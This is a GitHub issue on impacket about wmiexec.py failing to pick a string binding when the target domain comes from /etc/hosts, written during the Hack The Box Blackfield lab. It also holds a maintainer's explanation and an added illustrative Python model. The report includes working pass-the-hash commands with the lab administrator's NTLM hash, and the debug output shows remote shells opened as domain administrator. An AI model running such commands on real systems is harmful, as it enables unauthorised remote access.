fortra / impacket

Impacket is a collection of Python classes for working with network protocols.
https://www.coresecurity.com

wmiexec.py: "Can't find a valid stringBinding to connect" when using a domain defined in `/etc/hosts` #1746

Open 0xfalafel opened 4 months ago

0xfalafel commented 4 months ago

Configuration

impacket version: v0.12.0.dev1+20231015.203043.419e6f24
Python version: 3.11
Target OS: Microsoft Windows Server 2019 Standard - 10.0.17763 N/A Build 17763

Context

I was doing the Blackfield machine from Hack The Box, and I was surprised to see that wmiexec.py failed to connect to blackfield.local when using the administrator's hash.

My /etc/hosts configuration has a line for blackfield.local:

```
$ grep blackfield /etc/hosts
10.10.10.192    blackfield blackfield.local dc01.blackfield.local
```

Failing command

```
$ wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee administrator@blackfield.local -debug
Impacket v0.12.0.dev1+20231015.203043.419e6f24 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /home/kali/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket
[*] SMBv3.0 dialect used
[+] Target system is blackfield.local and isFQDN is True
[+] StringBinding: DC01[49907]
[+] StringBinding: 10.10.10.192[49907]
[+] StringBinding chosen: None
Traceback (most recent call last):
  File "/home/kali/.local/bin/wmiexec.py", line 95, in run
    iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket/dcerpc/v5/dcom/wmi.py", line 3259, in NTLMLogin
    resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket/dcerpc/v5/dcomrt.py", line 1326, in request
    self.connect(iid)
  File "/home/kali/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket/dcerpc/v5/dcomrt.py", line 1286, in connect
    raise Exception('Can\'t find a valid stringBinding to connect')
Exception: Can't find a valid stringBinding to connect
[-] Can't find a valid stringBinding to connect
```

Alternative working commands

The command fails when using blackfield.local, but works correctly when using dc01.blackfield.local, or directly the IP address 10.10.10.192.

dc01.blackfield.local

```
$ wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee administrator@dc01.blackfield.local -debug
Impacket v0.12.0.dev1+20231015.203043.419e6f24 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /home/kali/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket
[*] SMBv3.0 dialect used
[+] Target system is dc01.blackfield.local and isFQDN is True
[+] StringBinding: DC01[49907]
[+] StringBinding chosen: ncacn_ip_tcp:dc01.blackfield.local[49907]
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
blackfield\administrator

C:\>
```

10.10.10.192

```
$ wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee administrator@10.10.10.192 -debug
Impacket v0.12.0.dev1+20231015.203043.419e6f24 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /home/kali/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket
[*] SMBv3.0 dialect used
[+] Target system is 10.10.10.192 and isFQDN is False
[+] StringBinding: DC01[49907]
[+] StringBinding: 10.10.10.192[49907]
[+] StringBinding chosen: ncacn_ip_tcp:10.10.10.192[49907]
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
blackfield\administrator

C:\>exit
```

Additional context

Looking at the logs, we see that no StringBinding is chosen when using the domain from /etc/hosts.

blackfield.local

```
[+] Target system is blackfield.local and isFQDN is True
[+] StringBinding: DC01[49907]
[+] StringBinding: 10.10.10.192[49907]
[+] StringBinding chosen: None
```

While a StringBinding is chosen in the other 2 cases.

dc01.blackfield.local

```
[+] Target system is dc01.blackfield.local and isFQDN is True
[+] StringBinding: DC01[49907]
[+] StringBinding chosen: ncacn_ip_tcp:dc01.blackfield.local[49907]
```

10.10.10.192

```
[+] Target system is 10.10.10.192 and isFQDN is False
[+] StringBinding: DC01[49907]
[+] StringBinding: 10.10.10.192[49907]
[+] StringBinding chosen: ncacn_ip_tcp:10.10.10.192[49907]
```

anadrianmanrique commented 4 months ago

Hello @Faelian, this seems to be the expected behavior, as the current code is expecting to match the target parameter with the response from the remote OXID resolver (https://github.com/fortra/impacket/blob/master/impacket/dcerpc/v5/dcomrt.py#L1254). In your case, dc01.blackfield.local and 10.10.10.192 were answered as valid remote addresses to connect to, despite being able to resolve the remote IP by touching /etc/hosts.
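
A simplified model of the matching described in the comment above, added here as an example; it is not impacket's code and not part of the original thread. The two matching rules in the hypothetical `choose_binding` function are an assumption inferred from the three debug logs in the issue, and the binding list is constructed from that output.

```python
# Simplified model of string-binding selection. Assumption inferred from the
# debug logs in this issue; this is NOT impacket's implementation.

def choose_binding(target, bindings, is_fqdn):
    """Return the chosen 'ncacn_ip_tcp:...' string, or None if nothing matches."""
    target_up = target.upper()
    host_label = target_up.partition('.')[0]  # first DNS label of the target
    for addr in bindings:
        # Split 'DC01[49907]' into the name 'DC01' and the port suffix '[49907]'.
        name, bracket, port = addr.partition('[')
        port_suffix = bracket + port
        if target_up in name.upper():
            # The target text appears in the advertised address: use it as-is.
            return 'ncacn_ip_tcp:' + addr
        if is_fqdn and host_label in name.upper():
            # Only the host label matches: keep the caller's FQDN, reuse the port.
            return 'ncacn_ip_tcp:' + target + port_suffix
    # Purely textual comparison: a name that resolves to the right IP through
    # /etc/hosts still fails if it matches no advertised binding.
    return None


# Constructed from the "StringBinding:" lines quoted in the issue.
BINDINGS = ['DC01[49907]', '10.10.10.192[49907]']


def demo():
    """Replay the three targets from the issue against the advertised bindings."""
    cases = [
        ('blackfield.local', True),
        ('dc01.blackfield.local', True),
        ('10.10.10.192', False),
    ]
    return {target: choose_binding(target, BINDINGS, fqdn) for target, fqdn in cases}


if __name__ == '__main__':
    for target, chosen in demo().items():
        print(f'{target:24} -> {chosen}')
```

Under this model, `blackfield.local` fails because neither the full name nor its first label `blackfield` appears in `DC01` or `10.10.10.192`, even though the name resolves locally.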